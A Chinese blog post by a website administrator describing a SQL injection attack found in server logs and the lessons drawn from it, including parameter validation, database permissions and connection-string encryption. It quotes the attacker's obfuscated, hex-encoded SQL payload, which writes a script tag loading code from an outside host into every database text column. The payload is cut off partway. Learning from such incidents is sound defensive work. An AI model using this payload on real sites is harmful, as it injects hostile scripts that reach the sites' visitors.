很久没有来这里冒一个泡泡了,借口:太忙。
最近最头疼的莫过于管理的其中一个网站被注入式攻击,查日志查了两天才找到源头,那哥们通过16进制编码后绕过了关键字过滤的SQL恶意注入:
.aspx?sysno=2;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f383838312e73732e6c612f3e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20eXeC(@s)--@s%20vArChAr(8000)%20sEt%.........
类似上面的代码,很长。 今天终于算是松了一口气,这几天因为这个睡觉都不踏实。
教训:
1.切忌不要使用sql拼接字符串操作数据库,不能投方便;
2.对所有URL上的参数进行类型,长度等安全检查;
3.数据库的账户权限得一个个分配,不能偷懒;
4.Web.Config文件中的连接字符串最好加密。
最近发现用下面的方式比较保险的,运行中输入:
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -pef "connectionStrings" "E:\\Shopping" ;
如果是64位系统的服务器就要用:C:\WINDOWS\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe -pef "connectionStrings" "E:\\Shopping"
注意上面命令的空格。
5.对所有新手写的方法建议那些项目组长都check 一遍代码,不然带来的后果还是项目组长得承担;
另外,找到微软的一个小工具:
https://files.cnblogs.com/teracy/Scrawlr.rar 检查网站漏洞的,可惜是我找到我们网站漏洞后才找到这个工具的,用这个工具一下就能找到网站漏洞,微软的东西,还不错。推荐给园子里需要的朋友。
另外一个工具是远程协助的工具,蛮好玩的,在公司可以控制家里的电脑。不过服务器版的系统不能控制,只能看,呵呵
下载地址: https://files.cnblogs.com/teracy/TeamViewerchs.rar
好久没有来这里发布文章了,看博客园的首页的文章和原来不一样了,是不是我也可以借此机会放到首页亮一下,
。
希望上面提到的几点和提供的一些东西能对做web的朋友起一点点作用。
